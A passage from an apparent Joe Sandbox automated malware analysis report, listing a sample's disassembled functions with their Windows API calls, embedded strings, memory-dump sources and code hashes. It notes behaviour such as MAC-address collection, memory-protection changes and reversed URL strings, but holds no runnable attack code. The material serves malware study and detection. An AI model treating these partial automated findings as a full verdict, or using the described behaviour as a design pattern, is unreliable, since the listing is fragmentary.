                                                                                                                                              • Opcode Fuzzy Hash: 7932a7986847aa983057a8fbaf68b44f35c52c60a6344a4e009c62235e45fccc
                                                                                                                                              • Instruction Fuzzy Hash: 739177759193418EE3169A39D442776B794BFE6384F14CB2EFED4B32C1FB31A4899208
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00402D69 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,?,?,00403AB3,00000000,00000000,00000000,00000032), ref: 00402D7B
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00403AB3,00000000,00000000,00000000,00000032), ref: 00402D90
                                                                                                                                              • GetAdaptersInfo.IPHLPAPI(?), ref: 00402DB3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AdaptersFreeInfoLoad
                                                                                                                                              • String ID: %02X-%02X-%02X-%02X-%02X-%02X$(1D$iphlpapi.dll
                                                                                                                                              • API String ID: 2815801046-1156694461
                                                                                                                                              • Opcode ID: 667fbff6e5fb93a3dbdba40f8899a0c99632f19625a976099da760c66a306bb6
                                                                                                                                              • Instruction ID: 0f46a71ea7f385b85266391789cee45fc69f055f165f50e350831578ad950e10
                                                                                                                                              • Opcode Fuzzy Hash: 667fbff6e5fb93a3dbdba40f8899a0c99632f19625a976099da760c66a306bb6
                                                                                                                                              • Instruction Fuzzy Hash: 092127B1910160AECB169BA4DD58DFE7BB8AF09704F1006BFF015F21E1C7BC89008769
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00427361 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0042738F
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 0042739E
                                                                                                                                              • PathIsUNCA.SHLWAPI(?,?,?), ref: 004273D1
                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004273E9
                                                                                                                                              • CharUpperA.USER32(?), ref: 004273FA
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00427410
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042741C
                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 0042742C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindPath$CharCloseFileFirstFullInformationNameUpperVolumelstrcpylstrcpyn
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4238114063-0
                                                                                                                                              • Opcode ID: d785ae596bc36cb49a6f511f2bb699120d703fbd36700d512b5beef6b0218590
                                                                                                                                              • Instruction ID: ccc9f5d38c50f98e637bc9214232b1860236d421002e11859fbdac53a034a38f
                                                                                                                                              • Opcode Fuzzy Hash: d785ae596bc36cb49a6f511f2bb699120d703fbd36700d512b5beef6b0218590
                                                                                                                                              • Instruction Fuzzy Hash: 48316171600128ABCB10EF61EC48AEFBF78FF49354F908576F909D6151D7349A45CBA8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02566320 Relevance: 10.9, Strings: 8, Instructions: 875COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs$attempt to divide by zero
                                                                                                                                              • API String ID: 0-4042176451
                                                                                                                                              • Opcode ID: 78b580b8b07ee46674d64509a635b7dcdc570486e0dea744102eb26dbb48e890
                                                                                                                                              • Instruction ID: 0e11976b6b3a0f3b43979067b849d5bd75e70fee85a35e947c8874cd3536d5e5
                                                                                                                                              • Opcode Fuzzy Hash: 78b580b8b07ee46674d64509a635b7dcdc570486e0dea744102eb26dbb48e890
                                                                                                                                              • Instruction Fuzzy Hash: 8C722671A083519FD708CF29C48061AFBE6BFC8754F158A2EF899A7354D734EC498B86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040A44A Relevance: 10.6, APIs: 7, Instructions: 86fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 0040A465
                                                                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 0040A46C
                                                                                                                                              • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,04000000,00000000), ref: 0040A4A0
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,00000001,00000000,00000000,?,00000004,?,00000000), ref: 0040A4C5
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A4CC
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020), ref: 0040A52C
                                                                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 0040A533
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassCurrentPriorityProcess$CloseControlCreateDeviceFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2852580560-0
                                                                                                                                              • Opcode ID: 65ca535f78cc64cf9aea046d4da315f8869e2603256f29e9bdf8a66fe15ff912
                                                                                                                                              • Instruction ID: 09672a527c137082c86a82ddad234cb0f4bb7b68b2f76d9faa745a067a63ae63
                                                                                                                                              • Opcode Fuzzy Hash: 65ca535f78cc64cf9aea046d4da315f8869e2603256f29e9bdf8a66fe15ff912
                                                                                                                                              • Instruction Fuzzy Hash: 932108B6A00218BFE7109BA49C88AEE776CEB45748F5040B5F501E31D0D7789D868B7A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D430E Relevance: 9.9, Strings: 7, Instructions: 1197COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • assertion failed: self.ref_count() > 0, xrefs: 025D5230
                                                                                                                                              • [internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs, xrefs: 025D52C9
                                                                                                                                              • attempt to divide by zero, xrefs: 025D521C
                                                                                                                                              • Invalid, xrefs: 025D528D
                                                                                                                                              • attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs, xrefs: 025D51D6, 025D51EA
                                                                                                                                              • assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs, xrefs: 025D5208
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025D5325
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$FreeHeap
                                                                                                                                              • String ID: Invalid$[internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs$assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs$assertion failed: self.ref_count() > 0$attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs$attempt to divide by zero$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 911738859-2440271640
                                                                                                                                              • Opcode ID: 46201807224a08e332187ef9d7b5f2ac6c20bb220eadb25c7c7c50eb4a90d572
                                                                                                                                              • Instruction ID: e4ba71ace724c479d32c84785a4fc5a3a26236bc14bc1b171ed3b58966fab296
                                                                                                                                              • Opcode Fuzzy Hash: 46201807224a08e332187ef9d7b5f2ac6c20bb220eadb25c7c7c50eb4a90d572
                                                                                                                                              • Instruction Fuzzy Hash: 2CB293706043418FDB24CF28C49076ABBE2BFC8314F58896DE89A9B355DB70E845CF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025A3001 Relevance: 9.3, APIs: 4, Strings: 2, Instructions: 264memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A3E4D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A4331
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A43AC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: nown$nown
                                                                                                                                              • API String ID: 3298025750-102062727
                                                                                                                                              • Opcode ID: 23fed63d7be421afa8db1cbc949aee9749d88e73cffd2b1c14694c141e5d4d6d
                                                                                                                                              • Instruction ID: 4f2b1b079cee191c4879d075fadfaa003d70cbeeec5403f1fa773fc210bea203
                                                                                                                                              • Opcode Fuzzy Hash: 23fed63d7be421afa8db1cbc949aee9749d88e73cffd2b1c14694c141e5d4d6d
                                                                                                                                              • Instruction Fuzzy Hash: AFC18A70908781DBD725CF28C451BAEFBF1BFC8304F108A5DE99997290D770A985CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00401660 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • IsIconic.USER32(?), ref: 0040166A
                                                                                                                                                • Part of subcall function 004289E6: BeginPaint.USER32(?,?,?,?,0042292D), ref: 00428A19
                                                                                                                                              • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401691
                                                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0040169F
                                                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 004016A5
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004016B2
                                                                                                                                              • DrawIcon.USER32(?,?,?,?), ref: 004016EA
                                                                                                                                                • Part of subcall function 00428A41: EndPaint.USER32(?,?,?,?,00422953,?), ref: 00428A63
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1182735605-0
                                                                                                                                              • Opcode ID: 9409bb8eba40420717aaa7fd0813d9b11a5f1be16e6c6ee5dd2cc23651046658
                                                                                                                                              • Instruction ID: afd92d8a271adbd764b9b009a381ddf531eb1141bad508cde5b1c4dc8f1a29e6
                                                                                                                                              • Opcode Fuzzy Hash: 9409bb8eba40420717aaa7fd0813d9b11a5f1be16e6c6ee5dd2cc23651046658
                                                                                                                                              • Instruction Fuzzy Hash: 081160B53043019FC224EF78DD89E5B77A9ABD8214F844A3DF586C3290DA74E80ACA55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041DD1B Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 210timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041882A: EnterCriticalSection.KERNEL32(?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 00418852
                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000007,?,?,00000000,00000006,00000006,?,0041E2EE,00418484,?,?,0000003C,00000000,?,?,0000003C), ref: 0041DEAD
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044B4B4,000000FF,0000003F,00000000,?,?,00000000,00000006,00000006,?,0041E2EE,00418484,?), ref: 0041DF39
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044B508,000000FF,0000003F,00000000,?,?,00000000,00000006,00000006,?,0041E2EE,00418484,?), ref: 0041DF6B
                                                                                                                                                • Part of subcall function 00418796: LeaveCriticalSection.KERNEL32(?,004153AC,00000004,00415372,0043A448,0000000C,004153BE,000000E0,004153E9,?,004187CB,00000018,76170A60,?,?,00418843), ref: 004187A3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharCriticalMultiSectionWide$EnterInformationLeaveTimeZone
                                                                                                                                              • String ID: LD$`LD
                                                                                                                                              • API String ID: 2882866139-3452085429
                                                                                                                                              • Opcode ID: 3a1ce0b5cb7e44d9997b0b6c4af26172a2f4434b0736f3dcb0848fd7b5d39ad8
                                                                                                                                              • Instruction ID: 9d7b8684f2b8dc08f448c479742face438cddb3c02e48bd0b6daa426eba2df3e
                                                                                                                                              • Opcode Fuzzy Hash: 3a1ce0b5cb7e44d9997b0b6c4af26172a2f4434b0736f3dcb0848fd7b5d39ad8
                                                                                                                                              • Instruction Fuzzy Hash: AE6149B4D052449FD7209F29ACC1BA67BA8EB42355B19013FF050D72A1DB388DC2CB9D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429E88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35librarystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrcpyA.KERNEL32(00000800,LOC), ref: 00429EAE
                                                                                                                                              • wsprintfA.USER32 ref: 00429EC2
                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00429ED2
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 00429EED
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLibraryLoadLocalelstrcpywsprintf
                                                                                                                                              • String ID: LOC
                                                                                                                                              • API String ID: 2301429115-519433814
                                                                                                                                              • Opcode ID: 55c4f7f6bd3d83fe0638668a92045e554d39542dee11adfa9b5a70be7e0f19cc
                                                                                                                                              • Instruction ID: ba9a9e911526f724f6bd684c18380571f0978ced8412fde1539fc42cd5b17a32
                                                                                                                                              • Opcode Fuzzy Hash: 55c4f7f6bd3d83fe0638668a92045e554d39542dee11adfa9b5a70be7e0f19cc
                                                                                                                                              • Instruction Fuzzy Hash: 4001FB7060020DEBCF10DF60ED4AEDA77B9AB04318F808071B915D6190DB749A4A9B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257B090 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 429memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257B173
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257B50E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: ://$ptth$qtth
                                                                                                                                              • API String ID: 3298025750-2468130592
                                                                                                                                              • Opcode ID: c548b7b91631d0245953ed493d751a32aeb56227ca8255df533831450b0c894a
                                                                                                                                              • Instruction ID: a244649d1debb81b000e5667021a160e3f0b9cb55b629e1690b9bfc2f263ad0b
                                                                                                                                              • Opcode Fuzzy Hash: c548b7b91631d0245953ed493d751a32aeb56227ca8255df533831450b0c894a
                                                                                                                                              • Instruction Fuzzy Hash: 2FF1A271A483029FD714CF28D48062AFBE2BFC4718F158A2EE4999B391D771DD45CB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041E91D Relevance: 7.6, APIs: 5, Instructions: 86memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0041E937
                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041E948
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0041E98E
                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0041E9BD
                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0041E9E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4136887677-0
                                                                                                                                              • Opcode ID: ff6dd850e0057acba23b8827cf18eb4f3ead2c0418c749c99c268d3db089d540
                                                                                                                                              • Instruction ID: 32a2ad3af116692e63516f6cd1c830bccfaa7a2d380c1cd808f7f1f6e83c7fb5
                                                                                                                                              • Opcode Fuzzy Hash: ff6dd850e0057acba23b8827cf18eb4f3ead2c0418c749c99c268d3db089d540
                                                                                                                                              • Instruction Fuzzy Hash: 0A21E7B6B10209EBDB20CBB5DC45FFE77B8EB08345F540076EA02E3281D6789D858798
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041C882 Relevance: 7.5, APIs: 5, Instructions: 27timethreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041C88D
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0041C899
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041C8A1
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0041C8A9
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0041C8B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
